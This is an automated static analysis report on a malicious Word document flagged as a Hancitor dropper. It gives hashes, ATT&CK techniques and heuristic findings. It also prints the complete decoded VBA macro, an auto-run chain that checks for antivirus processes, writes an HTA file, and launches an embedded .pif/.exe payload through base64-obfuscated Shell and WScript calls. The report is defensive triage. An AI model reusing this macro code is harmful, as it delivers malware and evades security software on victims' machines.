Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3651a332eae5a4ba…

MALICIOUS

Office (OLE)

Size: 211.0 KB
Created: 2018-07-24 12:02:00
Authoring application: Microsoft Office Word
First seen: 2019-03-10
MD5: 864bc5cfba574400353cb30efad9e033
SHA-1: 3f2ecb819f2129a1ef13ca4f2994e8096873396c
SHA-256: 3651a332eae5a4ba7a8f52d7e9a7d214f9537a7fb70761f86f5408b7049da03e
Risk Score: 680

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1140 Deobfuscate or Obfuscate Malicious Code
  • T1071.001 Web Protocols

This Office document contains VBA macros that are triggered by the Document_Open event. The macros utilize WScript.Shell and WMI to execute a second-stage payload, indicated by the decoded command 'WINDOWSTATE="normal"> <script type="text/javascript" language="javascript"> WshShell = new ActiveXObject("WScript.Shell"); WshShell.Run("6.exe", 1, false); </script> <SCRIPT LANGUAGE="VBScript"'. The presence of VirtualProtect API calls and XOR-encoded strings further suggests malicious activity, likely for code execution and obfuscation.

Heuristics (18)

  • Office EPRINT stream contains EMF object [high, CVE related] OLE_EPRINT_EMF_OBJECT
    OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is relevant Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
  • ClamAV: Doc.Dropper.Hancitor-6774061-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Hancitor-6774061-0
  • XOR-encoded strings (key 0x40) [critical] SC_XOR_ENCODED
    Found 3 Windows library/API name(s) XOR-encoded with single-byte key 0x40: 'LoadLibraryA', 'GetProcAddress', 'VirtualAlloc'
    Disassembly
    x86 disassembly; validity: uncertain (0.584); 2/2 branch targets land on an instruction boundary (100% coherence)
    00020ECB  0c2f              or al, 0x2f
    00020ECD  21240c            and dword ptr [esp + ecx], esp
    00020ED0  2922              sub dword ptr [edx], esp
    00020ED2  3221              xor ah, byte ptr [ecx]
    00020ED4  3239              xor bh, byte ptr [ecx]
    00020ED6  0140c3            add dword ptr [eax - 0x3d], eax
    00020ED9  8043c9c5          add byte ptr [ebx - 0x37], 0xc5
    00020EDD  58                pop eax
    00020EDE  bfbfbf18cb        mov edi, 0xcb18bfbf
    00020EE3  c558bf            lds ebx, ptr [eax - 0x41]
    00020EE6  bfbf10cb0d        mov edi, 0xdcb10bf
    00020EEB  b011              mov al, 0x11
    00020EED  bf1598c9c5        mov edi, 0xc5c99815
    00020EF2  74bf              je 0x20eb3
    00020EF4  bfbf10a840        mov edi, 0x40a810bf
    00020EF9  40                inc eax
    00020EFA  40                inc eax
    00020EFB  40                inc eax
    00020EFC  18ab4d162932      sbb byte ptr [ebx + 0x3229164d], ch
    00020F02  3435              xor al, 0x35
    00020F04  212c01            and dword ptr [ecx + eax], ebp
    00020F07  2c2c              sub al, 0x2c
    00020F09  2f                das
    00020F0A  2340c3            and eax, dword ptr [eax - 0x3d]
    00020F0D  8043c9c5          add byte ptr [ebx - 0x37], 0xc5
    00020F11  78bf              js 0x20ed2
    00020F13  bfbf18cbd5        mov edi, 0xd5cb18bf
    00020F18  78bf              js 0x20ed9
    00020F1A  bfbf12cb05        mov edi, 0x5cb12bf
    00020F1F  b010              mov al, 0x10
    00020F21  bf1598c905        mov edi, 0x5c99815
    00020F26  f8                clc
    00020F27  10                .byte 0x10
    00020F28  a840              test al, 0x40
    00020F2A  40                inc eax
  • Ole10Native package drops an auto-executable payload [critical] OFFICE_PACKAGE_RISKY_FILE
    OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use; it is a malware-delivery dropper.
  • VBA macros detected [medium, 9 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
      Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide
  • WScript.Shell usage [critical] OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set wsh = VBA.CreateObject("WScript.Shell")
  • VBA WMI Win32_Process launcher [critical] OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
    Matched line in script
    Set gDvcvsd = GetObject("wi" & "nmgmts:")
  • VBA Base64-decoded Shell command stager [critical] OLE_VBA_BASE64_SHELL_COMMAND_STAGER
    VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
    Matched line in script
    Set gDvcvsd = GetObject("wi" & "nmgmts:")
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set wsh = VBA.CreateObject("WScript.Shell")
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set gDvcvsd = GetObject("wi" & "nmgmts:")
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Open Environ("Temp") & "\1.hta" For Output As #1
  • Reference to Windows Script Host [high] SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Reference to VirtualProtect API [medium] SC_STR_VIRTUALPROTECT
    Reference to VirtualProtect API
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs (each found in document text, OLE body):
    • http://ns.adobe.com/xap/1.0/
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://ns.adobe.com/photoshop/1.0/
    • http://purl.org/dc/elements/1.1/
    • http://ns.adobe.com/xap/1.0/mm/
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml
    • http://schemas.openxmlformats.org/drawingml/2006/main

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5831 bytes
SHA-256: 2334c61645937599dbb58927896e4076c8fc8d425a3532fac86ec4cb513493b3
Detection: ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next


Call kfs
    


Call sdfsdf

 Set d = New DataObject
    d.SetText " "
    d.PutInClipboard
    Selection.MoveUp Unit:=wdScreen, Count:=7
   Selection.MoveUp Unit:=wdScreen, Count:=7
    Selection.MoveLeft Unit:=wdCharacter, Count:=13

  Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", 3, t)


Call Module1.killo

End Sub

Private Sub Document_Close()
Call closee

End Sub

Private Function DecodeBase64(ByVal strData As String) As Byte()

 

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
    

    Set objXML = New MSXML2.DOMDocument
    Set objNode = objXML.createElement("b64")
    objNode.dataType = "bin.base64"
    objNode.Text = strData
    DecodeBase64 = objNode.nodeTypedValue
    
    Set objNode = Nothing
    Set objXML = Nothing

 

End Function

Attribute VB_Name = "Module1"
Sub killo()
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatXMLDocument
Application.Quit
End Sub

Attribute VB_Name = "Module2"
Sub closee()




Dim Hdfgdwd, gDvcvsd
Dim fdfdgsd
Set gDvcvsd = GetObject("wi" & "nmgmts:")
Dim gfdfsfsfs
Set Hdfgdwd = gDvcvsd.ExecQuery("SELECT * FROM Win32_Process")
Dim hdffsdfs
For Each x In Hdfgdwd
Set wsh = VBA.CreateObject("WScript.Shell")
Dim pipec As Boolean: pipec = True


 If x.Name = "bdagent.exe" Then
 Dim kk
 kk = StrConv(DecodeBase64("IFdJTkRPV1NUQVRFPSJub3JtYWwiPg0KICAgIDxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQogICAgDQogICAgICAgIFdzaFNoZWxsID0gbmV3IEFjdGl2ZVhPYmplY3QoIldTY3JpcHQuU2hlbGwiKTsNCiAgICAgICAgV3NoU2hlbGwuUnVuKCI2LmV4ZSIsIDEsIGZhbHNlKTsNCiAgICAgICAgDQogICAgPC9zY3JpcHQ+DQogPFNDUklQVCBMQU5HVUFHRT0iVkJTY3JpcHQiPg0KICAgICAgICAgIFdpbmRvdy5DbG9zZQ0KICAgICA8L1NDUklQVD4NCjwvaGVhZD4NCjxib2R5Pg0KICAgDQo8L2JvZHk+DQo8L2h0bWw+DQo="), vbUnicode)
 
Open Environ("Temp") & "\1.hta" For Output As #1
  Print #1, StrConv(DecodeBase64("PGh0bWw+DQo8aGVhZD4NCiA8U0NSSVBUIExBTkdVQUdFPSJWQlNjcmlwdCI+DQogICAgICAgICAgV2luZG93Lk1vdmVUbyAtMzIwMDAsIC0zMjAwMA0KICAgICA8L1NDUklQVD4NCiAgICA8dGl0bGU+QXBwbGljYXRpb24gRXhlY3V0ZXI8L3RpdGxlPg0KICAgIDxIVEE6QVBQTElDQVRJT04gSUQ9Im9NeUFwcCIgDQogICAgICAgIEFQUExJQ0FUSU9OTkFNRT0iQXBwbGljYXRpb24gRXhlY3V0ZXIiIA0KICAgICAgICBCT1JERVI9Im5vIg0KICAgICAgICBDQVBUSU9OPSJubyINCiAgICAgICAgU0hPV0lOVEFTS0JBUj0ieWVzIg0KICAgICAgICBTSU5HTEVJTlNUQU5DRT0ieWVzIg0KICAgICAgICBTWVNNRU5VPSJ5ZXMiDQogICAgICAgIFNDUk9MTD0ibm8i"), vbUnicode)
  Print #1, kk
  Close #1
  
ChDir Environ("Temp")
wsh.Run Environ("Temp") & "\1.hta", 0, False
Exit Sub
   End If
    
   
    If x.Name = "PSUAMain.exe" Then

  Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide

Exit Sub
   End If
   
       If x.Name = "n360.exe" Then

  Shell Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide

Exit Sub
   End If
Next


Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & StrConv(DecodeBase64("XDYucGlm"), vbUnicode), vbHide


End Sub


Private Function DecodeBase64(ByVal strData As String) As Byte()

 

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
    

    Set objXML = New MSXML2.DOMDocument
    Set objNode = objXML.createElement("b64")
    objNode.dataType = "bin.base64"
    objNode.Text = strData
    DecodeBase64 = objNode.nodeTypedValue
    
    Set objNode = Nothing
    Set objXML = Nothing

 

End Function



Attribute VB_Name = "Module3"
Sub kfs()
Selection.MoveDown Unit:=wdScreen, Count:=7
    Selection.MoveDown Unit:=wdScreen, Count:=7
 Selection.MoveRight Unit:=wdCharacter, Count:=24
    Selection.TypeBackspace
        Selection.Copy

End Sub

Attribute VB_Name = "Module4"

Sub sdfsdf()

Dim kk, lll, jgf
jgf = "." & "p" & "i" & "f"
lll = "6" & ".e" & "x" & "e"
kk = ".p" & "if"
ChDir Environ("Temp")
Selection.TypeBackspace

   Dim FSO As Object
Set FSO = CreateObject("scripting.filesystemobject")


FSO.copyfile Source:="5C" & jgf, Destination:=lll
FSO.copyfile Source:="5C" & kk, Destination:="6" & UserForm1.TextBox1.Text
End Sub
Private Function DecodeBase64(ByVal strData As String) As Byte()

 

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
    

    Set objXML = New MSXML2.DOMDocument
    Set objNode = objXML.createElement("b64")
    objNode.dataType = "bin.base64"
    objNode.Text = strData
    DecodeBase64 = objNode.nodeTypedValue
    
    Set objNode = Nothing
    Set objXML = Nothing

 

End Function



Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{C15E5D10-EA1A-4675-8344-E4EC77A61762}{F8F67BAB-9581-4A46-BB4B-EA41F02BB5B7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{02C1F6EF-A6C3-451F-B117-07A65A835E9C}{A3F975E9-AF87-4060-B351-1DCE518ED2A8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Filename: ole10native_00.bin
Kind: ole-package
Source: OLE Ole10Native stream: ObjectPool/_1598104975/Ole10Native
Size: 69908 bytes
SHA-256: 3bd66f724d16569acc6db9fc938afa5185e41dc00ddfc037fc56f01155ab3665

Filename: ole10native_00_5C.pif
Kind: ole-package-payload
Source: OLE Ole10Native payload: ObjectPool/_1598104975/Ole10Native; display_name=5C.pif; full_path=C:\Users\win7home\AppData\Local\Temp\5C.pif; temp_path=; def_file=
Size: 69632 bytes
SHA-256: a8137c26efb6e13e4a8d5c7ee8becc3e3e6f5fcb5281bfb05ca8b0a779392307